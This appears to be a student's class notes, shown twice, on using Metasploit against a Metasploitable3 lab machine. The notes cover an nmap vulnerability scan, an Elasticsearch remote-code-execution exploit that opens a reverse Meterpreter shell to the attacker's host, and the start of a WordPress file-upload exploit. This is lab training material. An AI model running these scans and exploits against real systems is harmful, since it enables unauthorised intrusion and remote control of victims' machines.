lk/distros/kali/metasploit.md

> service postgresql start

> systemctl status postgresql

> msfdb init

start the metasploit

> msfconfole

show exploits

Examples:

> info exploit/something

> search cve:2019

## Basic theory

There are vulnerabilities and payloads.

Payloads would typically give us a shell on the remote system.  Android, Linux and Windows require different shells.

You can attach via 'reverse' or 'bind'.  A 'bind' is best, as the user opens a port, and you connect.  Mostly, you have to use 'reverse', which opens a connection to you.

# Notes for Class

Victim: 172.18.3.26

> nmap -Pn -sV 172.18.3.26 --script=vuln

> nmap -Pn -sV 172.18.3.26 

Output:

```

Service scan Timing: About 66.67% done; ETC: 15:28 (0:00:10 remaining)
Nmap scan report for 172.18.3.26
Host is up (0.016s latency).
Not shown: 988 filtered ports
PORT      STATE SERVICE          VERSION
21/tcp    open  ftp              Microsoft ftpd
22/tcp    open  ssh              OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http             Microsoft IIS httpd 7.5
4848/tcp  open  appserv-http?
8022/tcp  open  oa-system?
8080/tcp  open  http             Sun GlassFish Open Source Edition  4.0
8383/tcp  open  ssl/m2mservices?
9200/tcp  open  tcpwrapped
49153/tcp open  unknown
49154/tcp open  unknown
49159/tcp open  unknown
49161/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4848-TCP:V=7.80%I=7%D=9/14%Time=5D7D06F5%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,91,"HTTP/1\.1\x20302\x20Found\r\nLocation:\x20https://metasplo
SF:itable3-win2k8:4848/\r\nDate:\x20Sat,\x2014\x20Sep\x202019\x2015:27:44\
SF:x20GMT\r\nConnection:\x20close\r\nContent-Length:\x200\r\n\r\n");
MAC Address: D4:25:8B:B6:85:F5 (Intel Corporate)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

```

Note  this one:

`9200/tcp  open  tcpwrapped`

Apparently that's 'elasticsearch', so in metasploit we can do:

`search elasticsearch`

```
   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  auxiliary/scanner/elasticsearch/indices_enum                       normal     Yes    ElasticSearch Indices Enumeration Utility
   1  auxiliary/scanner/http/elasticsearch_traversal                     normal     Yes    ElasticSearch Snapshot API Directory Traversal
   2  exploit/multi/elasticsearch/script_mvel_rce       2013-12-09       excellent  Yes    ElasticSearch Dynamic Script Arbitrary Java Execution
   3  exploit/multi/elasticsearch/search_groovy_script  2015-02-11       excellent  Yes    ElasticSearch Search Groovy Sandbox Bypass
   4  exploit/multi/misc/xdh_x_exec                     2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution

```

If you want to use 2, `use 2` or `use/multi/ela` then tab out.

> show options

> set rhost 172.18.3.26

The remote port's already set at this point.

We've so far done use, rhost, and port.

> exploit

```
[*] Started reverse TCP handler on 172.18.3.112:4444 
[*] Trying to execute arbitrary Java...
[*] Discovering remote OS...
[+] Remote OS is 'Windows Server 2008 R2'
[*] Discovering TEMP path
[+] TEMP path identified: 'C:\Windows\TEMP\'
[*] Sending stage (53845 bytes) to 172.18.3.26
[*] Meterpreter session 1 opened (172.18.3.112:4444 -> 172.18.3.26:49311) at 2019-09-14 15:38:49 +0000
[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\LXjUK.jar' on the target
```

> dir

# Next Wordpress

http://172.18.3.26:8585/wordpress/

Back to normal shell.

> search wordpress ninja


> use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
initial commit 2020-01-02 00:04:35 +00:00			`> service postgresql start`

			`> systemctl status postgresql`

			`> msfdb init`

			`start the metasploit`

			`> msfconfole`

			`show exploits`

			`Examples:`

			`> info exploit/something`

			`> search cve:2019`

			`## Basic theory`

			`There are vulnerabilities and payloads.`

			`Payloads would typically give us a shell on the remote system. Android, Linux and Windows require different shells.`

			`You can attach via 'reverse' or 'bind'. A 'bind' is best, as the user opens a port, and you connect. Mostly, you have to use 'reverse', which opens a connection to you.`

			`# Notes for Class`

			`Victim: 172.18.3.26`

			`> nmap -Pn -sV 172.18.3.26 --script=vuln`

			`> nmap -Pn -sV 172.18.3.26`

			`Output:`

			```

			`Service scan Timing: About 66.67% done; ETC: 15:28 (0:00:10 remaining)`
			`Nmap scan report for 172.18.3.26`
			`Host is up (0.016s latency).`
			`Not shown: 988 filtered ports`
			`PORT STATE SERVICE VERSION`
			`21/tcp open ftp Microsoft ftpd`
			`22/tcp open ssh OpenSSH 7.1 (protocol 2.0)`
			`80/tcp open http Microsoft IIS httpd 7.5`
			`4848/tcp open appserv-http?`
			`8022/tcp open oa-system?`
			`8080/tcp open http Sun GlassFish Open Source Edition 4.0`
			`8383/tcp open ssl/m2mservices?`
			`9200/tcp open tcpwrapped`
			`49153/tcp open unknown`
			`49154/tcp open unknown`
			`49159/tcp open unknown`
			`49161/tcp open tcpwrapped`
			`1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :`
			`SF-Port4848-TCP:V=7.80%I=7%D=9/14%Time=5D7D06F5%P=x86_64-pc-linux-gnu%r(Ge`
			`SF:tRequest,91,"HTTP/1\.1\x20302\x20Found\r\nLocation:\x20https://metasplo`
			`SF:itable3-win2k8:4848/\r\nDate:\x20Sat,\x2014\x20Sep\x202019\x2015:27:44\`
			`SF:x20GMT\r\nConnection:\x20close\r\nContent-Length:\x200\r\n\r\n");`
			`MAC Address: D4:25:8B:B6:85:F5 (Intel Corporate)`
			`Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows`

			`Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .`

			```

			`Note this one:`

			`9200/tcp open tcpwrapped`

			`Apparently that's 'elasticsearch', so in metasploit we can do:`

			`search elasticsearch`

			```
			`# Name Disclosure Date Rank Check Description`
			`- ---- --------------- ---- ----- -----------`
			`0 auxiliary/scanner/elasticsearch/indices_enum normal Yes ElasticSearch Indices Enumeration Utility`
			`1 auxiliary/scanner/http/elasticsearch_traversal normal Yes ElasticSearch Snapshot API Directory Traversal`
			`2 exploit/multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution`
			`3 exploit/multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass`
			`4 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution`

			```

			If you want to use 2, `use 2` or `use/multi/ela` then tab out.

			`> show options`

			`> set rhost 172.18.3.26`

			`The remote port's already set at this point.`

			`We've so far done use, rhost, and port.`

			`> exploit`

			```
			`[*] Started reverse TCP handler on 172.18.3.112:4444`
			`[*] Trying to execute arbitrary Java...`
			`[*] Discovering remote OS...`
			`[+] Remote OS is 'Windows Server 2008 R2'`
			`[*] Discovering TEMP path`
			`[+] TEMP path identified: 'C:\Windows\TEMP\'`
			`[*] Sending stage (53845 bytes) to 172.18.3.26`
			`[*] Meterpreter session 1 opened (172.18.3.112:4444 -> 172.18.3.26:49311) at 2019-09-14 15:38:49 +0000`
			`[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\LXjUK.jar' on the target`
			```

			`> dir`

			`# Next Wordpress`

			`http://172.18.3.26:8585/wordpress/`

			`Back to normal shell.`

			`> search wordpress ninja`


			`> use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload`